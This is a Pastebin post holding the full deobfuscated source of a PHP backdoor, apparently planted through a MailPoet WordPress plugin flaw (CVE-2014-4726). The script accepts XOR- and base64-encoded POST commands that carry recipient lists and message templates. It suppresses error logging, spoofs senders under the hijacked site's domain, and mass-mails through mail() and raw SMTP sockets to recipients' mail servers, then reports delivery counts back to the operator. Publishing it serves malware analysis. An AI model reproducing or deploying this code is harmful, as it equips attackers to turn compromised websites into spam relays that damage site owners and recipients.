API tools faq
paste
Advertisement
felmoltor

info.php deobfuscated (MailPoet CVE-2014-4726 Payload?)

felmoltor
Jul 31st, 2014
287
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 19.30 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. $i59 = "Euc<v#`5R1s?j{\nJnd8,KA>}wIQ\r7gp;^U0\"YBSH@!=&MOG\\Vlaz\$2mtxLFDX[Zb:f6)~h+%'_k/iyN4CTer.|(3]-\tq9*o PW";
  4.  
  5. @error_reporting(NULL);
  6. @ini_set(error_log, NULL);
  7. @ini_set(log_errors, 0);
  8.  
  9. $vxlcl82 = array(
  10.     "dataTo" => "",
  11.     "fromLogin" => "",
  12.     "fromName" => "",
  13.     "subjTempl" => "",
  14.     "bodyTempl" => "",
  15.     "hostFrom" => "",
  16.     "initnbsock" => FALSE,
  17.     "initsock" => FALSE,
  18.     "initmail" => FALSE
  19. );
  20.  
  21. if (FALSE == bctio27($i59, $vxlcl82))
  22.     {
  23.     echo PHP_OS."+".md5(0987654321)."+01+[[]]";
  24.     exit;
  25.     }
  26.  
  27. $unahu45 = array();
  28.  
  29. foreach($vxlcl82["dataTo"] as $xenfh75)
  30.     {
  31.     $iztbg25 = array(
  32.         "nameFirst" => "",
  33.         "nameLast" => "",
  34.         "emailTo" => "",
  35.         "domainTo" => "",
  36.         "emailToLong" => "",
  37.         "forceFromFlag" => FALSE,
  38.         "emailFrom" => "",
  39.         "emailFromLong" => "",
  40.         "subj" => "",
  41.         "body" => "",
  42.         "headersMain" => "",
  43.         "headersFrom" => "",
  44.         "headersSock" => "",
  45.         "mxHost" => "",
  46.         "mxAddr" => null,
  47.         "sock" => null,
  48.         "stime" => null,
  49.         "nbstep" => 0,
  50.         "errline" => "",
  51.         "done" => FALSE,
  52.         "doneWay" => 0,
  53.         "failSmtp" => FALSE
  54.     );
  55.     if (FALSE == xagwq19($i59, $xenfh75, $vxlcl82, $iztbg25))
  56.         {
  57.         echo PHP_OS."+".md5(1111111111)."+02+[[".fsuxu12($i59, $xenfh75)."]]\n";
  58.         continue;
  59.         }
  60.  
  61.     slltw17($i59, $vxlcl82, $iztbg25);
  62.     hkblq88($i59, $vxlcl82, $iztbg25);
  63.     $unahu45[] = $iztbg25;
  64.     }
  65.  
  66. crnms40($i59, $vxlcl82, $unahu45);
  67. pkwxg22($i59, $vxlcl82, $unahu45);
  68. glxex92($i59, $vxlcl82, $unahu45);
  69. ygxtf52($i59, $vxlcl82, $unahu45);
  70.  
  71. function fsuxu12($i59, $nihvk86)
  72.     {
  73.     $esjbi0 = "";
  74.     for ($haxae63 = 0; $haxae63 < strlen($nihvk86); $haxae63++) $esjbi0.= chr(ord($nihvk86[$haxae63]) ^ 2);
  75.     return base64_encode($esjbi0);
  76.     }
  77.  
  78. function ygxtf52($i59, $vxlcl82, $unahu45)
  79.     {
  80.     if ($vxlcl82["initnbsock"] == FALSE && $vxlcl82["initsock"] == FALSE && $vxlcl82["initmail"] == FALSE)
  81.         {
  82.         echo PHP_OS."+".md5(1111111111)."+03+[[".fsuxu12($i59, "no func exists")."]]\n";
  83.         return;
  84.         }
  85.  
  86.     $hmcex42 = 0;
  87.     for ($jkbvz84 = 0; $jkbvz84 < count($unahu45); $jkbvz84++)
  88.         {
  89.         if ($unahu45[$jkbvz84]["failSmtp"] == TRUE)
  90.             {
  91.             echo PHP_OS."+".md5(2222222222)."+04+[[".fsuxu12($i59, $unahu45[$jkbvz84]["emailTo"]." :: ".$unahu45[$jkbvz84]["errline"])."]]\n";
  92.             }
  93.  
  94.         if ($unahu45[$jkbvz84]["done"] == TRUE)
  95.             {
  96.             $hmcex42++;
  97.             }
  98.         }
  99.  
  100.     if ($hmcex42 == 0)
  101.         {
  102.         echo PHP_OS."+".md5(0987654321)."+04+[[]]";
  103.         }
  104.       else
  105.         {
  106.         echo "OK+".md5(1234567890)."+".$hmcex42."+".count($unahu45)."\n";
  107.         }
  108.     }
  109.  
  110. function pkwxg22($i59, &$vxlcl82, &$unahu45)
  111.     {
  112.     if (!function_exists("mail"))
  113.         {
  114.         $vxlcl82["initmail"] = FALSE;
  115.         return;
  116.         }
  117.  
  118.     $vxlcl82["initmail"] = TRUE;
  119.     for ($jkbvz84 = 0; $jkbvz84 < count($unahu45); $jkbvz84++)
  120.         {
  121.         if ($unahu45[$jkbvz84]["done"] == TRUE) continue;
  122.         if ($unahu45[$jkbvz84]["forceFromFlag"])
  123.             {
  124.             if (@mail($unahu45[$jkbvz84]["emailToLong"], $unahu45[$jkbvz84]["subj"], $unahu45[$jkbvz84]["body"], $unahu45[$jkbvz84]["headersFrom"].$unahu45[$jkbvz84]["headersMain"], "-f".$unahu45[$jkbvz84]["emailFrom"]))
  125.                 {
  126.                 $unahu45[$jkbvz84]["done"] = TRUE;
  127.                 $unahu45[$jkbvz84]["doneWay"] = 2;
  128.                 }
  129.               else
  130.                 {
  131.                 $unahu45[$jkbvz84]["done"] = FALSE;
  132.                 }
  133.             }
  134.           else
  135.             {
  136.             if (@mail($unahu45[$jkbvz84]["emailToLong"], $unahu45[$jkbvz84]["subj"], $unahu45[$jkbvz84]["body"], $unahu45[$jkbvz84]["headersMain"]))
  137.                 {
  138.                 $unahu45[$jkbvz84]["done"] = TRUE;
  139.                 $unahu45[$jkbvz84]["doneWay"] = 2;
  140.                 }
  141.               else
  142.                 {
  143.                 $unahu45[$jkbvz84]["done"] = FALSE;
  144.                 }
  145.             }
  146.         }
  147.     }
  148.  
  149. function fjcwd9($i59, $kcpbr76)
  150.     {
  151.     $esjbi0 = '';
  152.     while ($itygz27 = @fgets($kcpbr76, 4096))
  153.         {
  154.         $esjbi0.= $itygz27;
  155.         if (substr($itygz27, 3, 1) == $i59[95]) break;
  156.         }
  157.  
  158.     return $esjbi0;
  159.     }
  160.  
  161. function glxex92($i59, &$vxlcl82, &$unahu45)
  162.     {
  163.     if (!function_exists("fsockopen") && !function_exists("pfsockopen") && !function_exists("stream_socket_client"))
  164.         {
  165.         $vxlcl82["initsock"] = FALSE;
  166.         return;
  167.         }
  168.  
  169.     $vxlcl82["initsock"] = TRUE;
  170.     for ($jkbvz84 = 0; $jkbvz84 < count($unahu45); $jkbvz84++)
  171.         {
  172.         if ($unahu45[$jkbvz84]["done"] == TRUE)
  173.             {
  174.             continue;
  175.             }
  176.  
  177.         if ($unahu45[$jkbvz84]["failSmtp"] == TRUE)
  178.             {
  179.             continue;
  180.             }
  181.  
  182.         if ($unahu45[$jkbvz84]["mxAddr"] == null)
  183.             {
  184.             $unahu45[$jkbvz84]["mxAddr"] = gethostbyname($unahu45[$jkbvz84]["mxHost"]);
  185.             }
  186.  
  187.         $unahu45[$jkbvz84]["nbstep"] = 0;
  188.         $lllaf63 = 0;
  189.         $rbjyp61 = "";
  190.         if (function_exists("fsockopen"))
  191.             {
  192.             $unahu45[$jkbvz84]["sock"] = @fsockopen($unahu45[$jkbvz84]["mxAddr"], 25, $lllaf63, $rbjyp61, 15);
  193.             }
  194.         elseif (function_exists("pfsockopen"))
  195.             {
  196.             $unahu45[$jkbvz84]["sock"] = @pfsockopen($unahu45[$jkbvz84]["mxAddr"], 25, $lllaf63, $rbjyp61, 15);
  197.             }
  198.         elseif (function_exists("stream_socket_client"))
  199.             {
  200.             $unahu45[$jkbvz84]["sock"] = @stream_socket_client("tcp://".$unahu45[$jkbvz84]["mxAddr"].":25", $lllaf63, $rbjyp61, 15);
  201.             }
  202.           else
  203.             {
  204.             $unahu45[$jkbvz84]["errline"] = "sock connect function";
  205.             continue;
  206.             }
  207.  
  208.         if (!$unahu45[$jkbvz84]["sock"])
  209.             {
  210.             $unahu45[$jkbvz84]["errline"] = "sock connect";
  211.             continue;
  212.             }
  213.  
  214.         $yzqyk58 = fjcwd9($i59, $unahu45[$jkbvz84]["sock"]);
  215.         @fputs($unahu45[$jkbvz84]["sock"], "EHLO ".$vxlcl82["hostFrom"]."\r\n");
  216.         $yzqyk58 = fjcwd9($i59, $unahu45[$jkbvz84]["sock"]);
  217.         if (substr($yzqyk58, 0, 3) != 250)
  218.             {
  219.             $unahu45[$jkbvz84]["nbstep"] = 2;
  220.             $unahu45[$jkbvz84]["errline"] = "<< ehlo ".trim(preg_replace("/\r\n/ ", $yzqyk58));
  221.             fclose($unahu45[$jkbvz84]["sock"]);
  222.             continue;
  223.             }
  224.  
  225.         @fputs($unahu45[$jkbvz84]["sock"], "MAIL FROM:<".$unahu45[$jkbvz84]["emailFrom"].">\r\n");
  226.         $yzqyk58 = fjcwd9($i59, $unahu45[$jkbvz84]["sock"]);
  227.         if (substr($yzqyk58, 0, 3) != 250)
  228.             {
  229.             $unahu45[$jkbvz84]["nbstep"] = 3;
  230.             $unahu45[$jkbvz84]["failSmtp"] = TRUE;
  231.             $unahu45[$jkbvz84]["errline"] = "<< mail from ".trim(preg_replace("/\r\n/ ",  $yzqyk58));
  232.             fclose($unahu45[$jkbvz84]["sock"]);
  233.             continue;
  234.             }
  235.  
  236.         @fputs($unahu45[$jkbvz84]["sock"], "RCPT TO:<".$unahu45[$jkbvz84]["emailTo"].">\r\n");
  237.         $yzqyk58 = fjcwd9($i59, $unahu45[$jkbvz84]["sock"]);
  238.         if (substr($yzqyk58, 0, 3) != 250 && substr($yzqyk58, 0, 3) != 251)
  239.             {
  240.             $unahu45[$jkbvz84]["nbstep"] = 4;
  241.             $unahu45[$jkbvz84]["failSmtp"] = TRUE;
  242.             $unahu45[$jkbvz84]["errline"] = "<< data ".trim(preg_replace("/\r\n/ ", $yzqyk58));
  243.             fclose($unahu45[$jkbvz84]["sock"]);
  244.             continue;
  245.             }
  246.  
  247.         @fputs($unahu45[$jkbvz84]["sock"], "DATA\r\n");
  248.         $yzqyk58 = fjcwd9($i59, $unahu45[$jkbvz84]["sock"]);
  249.         if (substr($yzqyk58, 0, 3) != 354)
  250.             {
  251.             $unahu45[$jkbvz84]["nbstep"] = 5;
  252.             $unahu45[$jkbvz84]["failSmtp"] = TRUE;
  253.             $unahu45[$jkbvz84]["errline"] = "<< data ".trim(preg_replace("/\r\n/ ", $yzqyk58));
  254.             fclose($unahu45[$jkbvz84]["sock"]);
  255.             continue;
  256.             }
  257.  
  258.         @fputs($unahu45[$jkbvz84]["sock"], $unahu45[$jkbvz84]["headersSock"]."\r\n".$unahu45[$jkbvz84]["body"]."\r\n.\r\n");
  259.         $yzqyk58 = fjcwd9($i59, $unahu45[$jkbvz84]["sock"]);
  260.         if (substr($yzqyk58, 0, 3) != 250)
  261.             {
  262.             $unahu45[$jkbvz84]["nbstep"] = 6;
  263.             $unahu45[$jkbvz84]["failSmtp"] = TRUE;
  264.             $unahu45[$jkbvz84]["errline"] = "<< body ".trim(preg_replace("/\r\n/ ", $yzqyk58));
  265.             fclose($unahu45[$jkbvz84]["sock"]);
  266.             continue;
  267.             }
  268.  
  269.         $unahu45[$jkbvz84]["nbstep"] = 6;
  270.         $unahu45[$jkbvz84]["errline"] = "sock done";
  271.         $unahu45[$jkbvz84]["done"] = TRUE;
  272.         $unahu45[$jkbvz84]["doneWay"] = 3;
  273.         @fputs($unahu45[$jkbvz84]["sock"], "QUIT\r\n");
  274.         @fclose($unahu45[$jkbvz84]["sock"]);
  275.         }
  276.  
  277.     return;
  278.     }
  279.  
  280. function wfyfz82($i59, $kcpbr76, &$ccdut93, &$wdnqf10, $ghjnv17)
  281.     {
  282.     $ccdut93[$wdnqf10[$kcpbr76]["orig"]]["nbstep"] = $ghjnv17;
  283.     $ccdut93[$wdnqf10[$kcpbr76]["orig"]]["stime"] = time(NULL);
  284.     $wdnqf10[$kcpbr76]["nbstep"] = $ghjnv17;
  285.     $wdnqf10[$kcpbr76]["stime"] = time(NULL);
  286.     }
  287.  
  288. function wdkay7($i59, $kcpbr76, &$ccdut93, &$wdnqf10, &$nxvux4, $tlqgr67)
  289.     {
  290.     $ccdut93[$wdnqf10[$kcpbr76]["orig"]]["errline"] = trim(preg_replace("/\r\n/ ", $tlqgr67));
  291.     $wwnfn92 = array_search($kcpbr76, $nxvux4);
  292.     unset($nxvux4[$wwnfn92]);
  293.     unset($wdnqf10[$kcpbr76]);
  294.     socket_close($kcpbr76);
  295.     }
  296.  
  297. function crnms40($i59, &$vxlcl82, &$unahu45)
  298.     {
  299.     if (!function_exists("socket_create") || !function_exists("socket_connect") || !function_exists("socket_select") || !function_exists("socket_read") || !function_exists("socket_write"))
  300.         {
  301.         $vxlcl82["initnbsock"] = FALSE;
  302.         return;
  303.         }
  304.  
  305.     $vxlcl82["initnbsock"] = TRUE;
  306.     $xglki37 = array();
  307.     $vfyxw97 = 35;
  308.     $pvbdh92 = 25;
  309.     $aaaqk92 = array();
  310.     $wbwts68 = array();
  311.     for ($jkbvz84 = 0; $jkbvz84 < count($unahu45); $jkbvz84++)
  312.         {
  313.         if ($unahu45["done"] == TRUE)
  314.             {
  315.             continue;
  316.             }
  317.  
  318.         if ($unahu45[$jkbvz84]["failSmtp"] == TRUE)
  319.             {
  320.             continue;
  321.             }
  322.  
  323.         $unahu45[$jkbvz84]["sock"] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  324.         if ($unahu45[$jkbvz84]["sock"] == FALSE)
  325.             {
  326.             $unahu45[$jkbvz84]["errline"] = "nb create socket";
  327.             continue;
  328.             }
  329.  
  330.         @socket_set_nonblock($unahu45[$jkbvz84]["sock"]);
  331.         $unahu45[$jkbvz84]["mxAddr"] = gethostbyname($unahu45[$jkbvz84]["mxHost"]);
  332.         $ncsee45 = @socket_connect($unahu45[$jkbvz84]["sock"], $unahu45[$jkbvz84]["mxHost"], 25);
  333.         if ($ncsee45 == FALSE)
  334.             {
  335.             $jnxjb61 = socket_last_error();
  336.             if ($jnxjb61 != 10035 && $jnxjb61 != SOCKET_EINPROGRESS && $jnxjb61 != SOCKET_EALREADY)
  337.                 {
  338.                 $unahu45[$jkbvz84]["errline"] = "nb connect socket";
  339.                 continue;
  340.                 }
  341.             }
  342.  
  343.         $unahu45[$jkbvz84]["stime"] = time(NULL);
  344.         $aaaqk92[] = $unahu45[$jkbvz84]["sock"];
  345.         $xglki37[$unahu45[$jkbvz84]["sock"]] = $unahu45[$jkbvz84];
  346.         $xglki37[$unahu45[$jkbvz84]["sock"]]["orig"] = $jkbvz84;
  347.         }
  348.  
  349.     while (count($aaaqk92) + count($wbwts68) > 0)
  350.         {
  351.         $ewqxb0 = $aaaqk92;
  352.         $olbdv78 = $wbwts68;
  353.         if (FALSE !== ($baluw62 = socket_select($olbdv78, $ewqxb0, $yyjgh73 = null, 0)))
  354.             {
  355.             if ($baluw62 > 0)
  356.                 {
  357.                 if (count($olbdv78) > 0)
  358.                     {
  359.                     foreach($olbdv78 as $ipocr99)
  360.                         {
  361.                         $yzqyk58 = @socket_read($ipocr99, 1024);
  362.                         if ($yzqyk58 == FALSE)
  363.                             {
  364.                             wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "nb sock read");
  365.                             continue;
  366.                             }
  367.  
  368.                         if ($xglki37[$ipocr99]["nbstep"] == 1)
  369.                             {
  370.                             $ncsee45 = @socket_write($ipocr99, "EHLO ".$vxlcl82["hostFrom"]."\r\n");
  371.                             if ($ncsee45 == FALSE)
  372.                                 {
  373.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, ">> nb ehlo");
  374.                                 continue;
  375.                                 }
  376.  
  377.                             wfyfz82($i59, $ipocr99, $unahu45, $xglki37, 2);
  378.                             }
  379.                         elseif ($xglki37[$ipocr99]["nbstep"] == 2)
  380.                             {
  381.                             if (substr($yzqyk58, 0, 3) != 250)
  382.                                 {
  383.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "<< nb ehlo".$yzqyk58);
  384.                                 continue;
  385.                                 }
  386.  
  387.                             $ncsee45 = @socket_write($ipocr99, "MAIL FROM:<".$xglki37[$ipocr99]["emailFrom"].">\r\n");
  388.                             if ($ncsee45 == FALSE)
  389.                                 {
  390.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, ">> nb mail from");
  391.                                 continue;
  392.                                 }
  393.  
  394.                             wfyfz82($i59, $ipocr99, $unahu45, $xglki37, 3);
  395.                             }
  396.                         elseif ($xglki37[$ipocr99]["nbstep"] == 3)
  397.                             {
  398.                             if (substr($yzqyk58, 0, 3) != 250)
  399.                                 {
  400.                                 $unahu45[$xglki37[$ipocr99]["orig"]]["failSmtp"] = TRUE;
  401.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "<< nb mail from".$yzqyk58);
  402.                                 continue;
  403.                                 }
  404.  
  405.                             $ncsee45 = @socket_write($ipocr99, "RCPT TO:<".$xglki37[$ipocr99]["emailTo"].">\r\n");
  406.                             if ($ncsee45 == FALSE)
  407.                                 {
  408.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, ">> nb rcpt to");
  409.                                 continue;
  410.                                 }
  411.  
  412.                             wfyfz82($i59, $ipocr99, $unahu45, $xglki37, 4);
  413.                             }
  414.                         elseif ($xglki37[$ipocr99]["nbstep"] == 4)
  415.                             {
  416.                             if (substr($yzqyk58, 0, 3) != 250 && substr($yzqyk58, 0, 3) != 251)
  417.                                 {
  418.                                 $unahu45[$xglki37[$ipocr99]["orig"]]["failSmtp"] = TRUE;
  419.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "<< nb rcpt to".$yzqyk58);
  420.                                 continue;
  421.                                 }
  422.  
  423.                             $ncsee45 = @socket_write($ipocr99, "DATA\r\n");
  424.                             if ($ncsee45 == FALSE)
  425.                                 {
  426.                                 print $yzqyk58;
  427.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, ">> nb data");
  428.                                 continue;
  429.                                 }
  430.  
  431.                             wfyfz82($i59, $ipocr99, $unahu45, $xglki37, 5);
  432.                             }
  433.                         elseif ($xglki37[$ipocr99]["nbstep"] == 5)
  434.                             {
  435.                             if (substr($yzqyk58, 0, 3) != 354)
  436.                                 {
  437.                                 $unahu45[$xglki37[$ipocr99]["orig"]]["failSmtp"] = TRUE;
  438.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "<< nb data".$yzqyk58);
  439.                                 continue;
  440.                                 }
  441.  
  442.                             $ncsee45 = @socket_write($ipocr99, $xglki37[$ipocr99]["headersSock"]."\r\n".$xglki37[$ipocr99]["body"]."\r\n.\r\n");
  443.                             if ($ncsee45 == FALSE)
  444.                                 {
  445.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, ">> nb body");
  446.                                 continue;
  447.                                 }
  448.  
  449.                             wfyfz82($i59, $ipocr99, $unahu45, $xglki37, 6);
  450.                             }
  451.                         elseif ($xglki37[$ipocr99]["nbstep"] == 6)
  452.                             {
  453.                             if (substr($yzqyk58, 0, 3) != 250)
  454.                                 {
  455.                                 $unahu45[$xglki37[$ipocr99]["orig"]]["failSmtp"] = TRUE;
  456.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "<< nb body".$yzqyk58);
  457.                                 continue;
  458.                                 }
  459.  
  460.                             $unahu45[$xglki37[$ipocr99]["orig"]]["failSmtp"] = FALSE;
  461.                             $unahu45[$xglki37[$ipocr99]["orig"]]["done"] = TRUE;
  462.                             $unahu45[$xglki37[$ipocr99]["orig"]]["doneWay"] = 1;
  463.                             $ncsee45 = @socket_write($ipocr99, "QUIT\r\n");
  464.                             if ($ncsee45 == FALSE)
  465.                                 {
  466.                                 wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, ">> nb quit");
  467.                                 continue;
  468.                                 }
  469.  
  470.                             wfyfz82($i59, $ipocr99, $unahu45, $xglki37, 6);
  471.                             wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "nb done");
  472.                             }
  473.                           else
  474.                             {
  475.                             wdkay7($i59, $ipocr99, $unahu45, $xglki37, $wbwts68, "nb unknown step");
  476.                             }
  477.                         }
  478.                     }
  479.  
  480.                 if (count($ewqxb0) > 0)
  481.                     {
  482.                     foreach($ewqxb0 as $eztco67)
  483.                         {
  484.                         wfyfz82($i59, $eztco67, $unahu45, $xglki37, 1);
  485.                         $wbwts68[] = $eztco67;
  486.                         $uzrsu74 = array_search($eztco67, $aaaqk92);
  487.                         unset($aaaqk92[$uzrsu74]);
  488.                         }
  489.                     }
  490.                 }
  491.             }
  492.           else
  493.             {
  494.             break;
  495.             }
  496.  
  497.         foreach($xglki37 as $nqhsc23)
  498.             {
  499.             $hklao9 = time(NULL);
  500.             if ($nqhsc23["nbstep"] == 0)
  501.                 {
  502.                 if ($nqhsc23["stime"] + $vfyxw97 < $hklao9)
  503.                     {
  504.                     wdkay7($i59, $nqhsc23["sock"], $unahu45, $xglki37, $aaaqk92, "nb sock conn timeout ".$nqhsc23["nbstep"]);
  505.                     }
  506.                 }
  507.               else
  508.                 {
  509.                 if ($nqhsc23["stime"] + $pvbdh92 < $hklao9)
  510.                     {
  511.                     closeSock($nqhsc23["sock"], $unahu45, $xglki37, $wbwts68, "nb sock r/w timeout".$nqhsc23["nbstep"]);
  512.                     }
  513.                 }
  514.             }
  515.         }
  516.     }
  517.  
  518. function hkblq88($i59, $vxlcl82, &$esjbi0)
  519.     {
  520.     $esjbi0["headersMain"] = "X-Priority: 3 (Normal)\r\n";
  521.     $esjbi0["headersMain"].= "MIME-Version: 1.0\r\n";
  522.     $esjbi0["headersMain"].= 'Content-Type: text/html; charset="iso-8859-1"\r\n';
  523.     $esjbi0["headersMain"].= "Content-Transfer-Encoding: 8bit\r\n";
  524.     $esjbi0["headersFrom"] = "From: ".$esjbi0["emailFromLong"]."\r\n";
  525.     $esjbi0["headersFrom"].= "Reply-To: ".$esjbi0["emailFromLong"]."\r\n";
  526.     $esjbi0["headersSock"] = "Date: ".@date("D, j M Y G:i:s O")."\r\n";
  527.     $esjbi0["headersSock"].= $esjbi0["headersFrom"];
  528.     $esjbi0["headersSock"].= "Message-ID: <".preg_replace("/(.{7})(.{5})(.{2}).*/", "$1-$2-$3", md5(time()))."@".$vxlcl82["hostFrom"].">.\r\n";
  529.     $esjbi0["headersSock"].= "To: ".$esjbi0["emailToLong"]."\r\n";
  530.     $esjbi0["headersSock"].= "Subject: ".$esjbi0["subj"]."\r\n";
  531.     $esjbi0["headersSock"].= $esjbi0["headersMain"];
  532.     }
  533.  
  534. function slltw17($i59, $vxlcl82, &$esjbi0)
  535.     {
  536.     $esjbi0["subj"] = @str_replace("%R_NAME%", $esjbi0["nameFirst"], $vxlcl82["subjTempl"]);
  537.     $esjbi0["subj"] = @str_replace("%R_LNAME%", $esjbi0["nameLast"], $esjbi0["subj"]);
  538.     $esjbi0["body"] = @str_replace("%R_NAME%", $esjbi0["nameFirst"], $vxlcl82["bodyTempl"]);
  539.     $esjbi0["body"] = @str_replace("%R_LNAME%", $esjbi0["nameLast"], $esjbi0["body"]);
  540.     }
  541.  
  542. function xagwq19($i59, $mfvuq23, $vxlcl82, &$esjbi0)
  543.     {
  544.     if (FALSE === @preg_match("/(.*?;)?(.*?;)?(.+@(.+)?);?/", $mfvuq23, $zroqx74))
  545.         {
  546.         return FALSE;
  547.         }
  548.  
  549.     if (!isset($zroqx74) || count($zroqx74) != 5)
  550.         {
  551.         return FALSE;
  552.         }
  553.  
  554.     $esjbi0["nameFirst"] = @ucfirst(str_replace(";", "", $zroqx74[1]));
  555.     $esjbi0["nameLast"] = @ucfirst(str_replace(";", "", $zroqx74[2]));
  556.     $esjbi0["emailTo"] = str_replace(";", "", $zroqx74[3]);
  557.     $esjbi0["domainTo"] = str_replace(";", "", $zroqx74[4]);
  558.     if (!isset($esjbi0["domainTo"]) || $esjbi0["domainTo"] == "")
  559.         {
  560.         return FALSE;
  561.         }
  562.  
  563.     if (!isset($esjbi0["emailTo"]) || $esjbi0["emailTo"] == "")
  564.         {
  565.         return FALSE;
  566.         }
  567.  
  568.     if (isset($esjbi0["nameFirst"]) && $esjbi0["nameFirst"] != "")
  569.         {
  570.         $esjbi0["emailToLong"] = '"'.$esjbi0["nameFirst"]." ".$esjbi0["nameLast"].'" <'.$esjbi0["emailTo"].">";
  571.         }
  572.       else
  573.         {
  574.         $esjbi0["emailToLong"] = $esjbi0["emailTo"];
  575.         }
  576.  
  577.     if (preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $vxlcl82["hostFrom"]) || @ini_get("safe_mode"))
  578.         {
  579.         $esjbi0["forceFromFlag"] = FALSE;
  580.         }
  581.       else
  582.         {
  583.         $esjbi0["forceFromFlag"] = TRUE;
  584.         }
  585.  
  586.     $esjbi0["emailFrom"] = $vxlcl82["fromLogin"]."@".$vxlcl82["hostFrom"];
  587.     if (isset($vxlcl82["fromName"]) && $vxlcl82["fromName"] != "")
  588.         {
  589.         $esjbi0["emailFromLong"] = $vxlcl82["fromName"]." <".$esjbi0["emailFrom"].">";
  590.         }
  591.       else
  592.         {
  593.         $esjbi0["emailFrom"] = $esjbi0["LongemailFrom"];
  594.         }
  595.  
  596.     $esjbi0["mxHost"] = "127.0.0.1";
  597.     if (function_exists("getmxrr"))
  598.         {
  599.         @getmxrr($esjbi0["domainTo"], $nhysx96, $ntryu13);
  600.         if (count($nhysx96) !== 0)
  601.             {
  602.             $haxae63 = array_keys($ntryu13, min($ntryu13));
  603.             $esjbi0["mxHost"] = $nhysx96[$haxae63[0]];
  604.             }
  605.         }
  606.  
  607.     return TRUE;
  608.     }
  609.  
  610. function bctio27($i59, &$esjbi0)
  611.     {
  612.     if (count($_POST) < 2)
  613.         {
  614.         return FALSE;
  615.         }
  616.  
  617.     $fnxyh15 = false;
  618.     $ybhhi32 = $wghts9 = "";
  619.     foreach(array_keys($_POST) as $zcxpv1)
  620.         {
  621.         if ($zcxpv1[0] == 'l') $ybhhi32 = $zcxpv1;
  622.         if ($zcxpv1[0] == 'd') $wghts9 = $zcxpv1;
  623.         if ($zcxpv1[0] == 'e') $xuzda17 = true;
  624.         }
  625.  
  626.     if ($ybhhi32 == "" || $wghts9 == "")
  627.         {
  628.         return FALSE;
  629.         }
  630.  
  631.     $owxdm76 = ppuqd76($i59, $ybhhi32, $xuzda17);
  632.     $ufusu43 = ppuqd76($i59, $wghts9, $xuzda17);
  633.     if ($owxdm76 == FALSE || $ufusu43 == FALSE)
  634.         {
  635.         return FALSE;
  636.         }
  637.  
  638.     $esjbi0["dataTo"] = @preg_split("/#/", $owxdm76);
  639.     $esjbi0["fromLogin"] = $esjbi0["fromName"] = $esjbi0["subjTempl"] = $esjbi0["bodyTempl"] = "";
  640.    
  641.     if (FALSE !== @preg_match("/<USER>(.*?)<\/USER>/ism", $ufusu43, $zroqx74) && isset($zroqx74) && count($zroqx74) > 1)
  642.         {
  643.         $esjbi0["fromLogin"] = $zroqx74[1];
  644.         }
  645.  
  646.     if (FALSE !== @preg_match("/<NAME>(.*?)<\/NAME>/ism", $ufusu43, $zroqx74) && isset($zroqx74) && count($zroqx74) > 1)
  647.         {
  648.         $esjbi0["fromName"] = $zroqx74[1];
  649.         }
  650.  
  651.     if (FALSE !== @preg_match("/<SUBJ>(.*?)<\/SUBJ>/ism", $ufusu43, $zroqx74) && isset($zroqx74) && count($zroqx74) > 1)
  652.         {
  653.         $esjbi0["subjTempl"] = $zroqx74[1];
  654.         }
  655.  
  656.     if (FALSE !== @preg_match("/<SBODY>(.*?)<\/SBODY>/ism", $ufusu43, $zroqx74) && isset($zroqx74) && count($zroqx74) > 1)
  657.         {
  658.         $esjbi0["bodyTempl"] = $zroqx74[1];
  659.         }
  660.  
  661.     $esjbi0["hostFrom"] = @preg_replace( "/^(www|ftp)\./i", '', @$_SERVER["HTTP_HOST"]);
  662.     return TRUE;
  663.     }
  664.  
  665. function ppuqd76($i59, $zcxpv1, $fnxyh15)
  666.     {
  667.     if (!isset($zcxpv1) || $zcxpv1 == "") return FALSE;
  668.     $couuh34 = @$_POST[$zcxpv1];
  669.     if ($fnxyh15)
  670.         {
  671.         $lyvyv48 = base64_decode($couuh34);
  672.         $couuh34 = '';
  673.         for ($haxae63 = 0; $haxae63 < strlen($lyvyv48); $haxae63++) $couuh34.= chr(ord($lyvyv48[$haxae63]) ^ 2);
  674.         }
  675.  
  676.     return urldecode(stripslashes($couuh34));
  677.     }
  678.  
  679. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!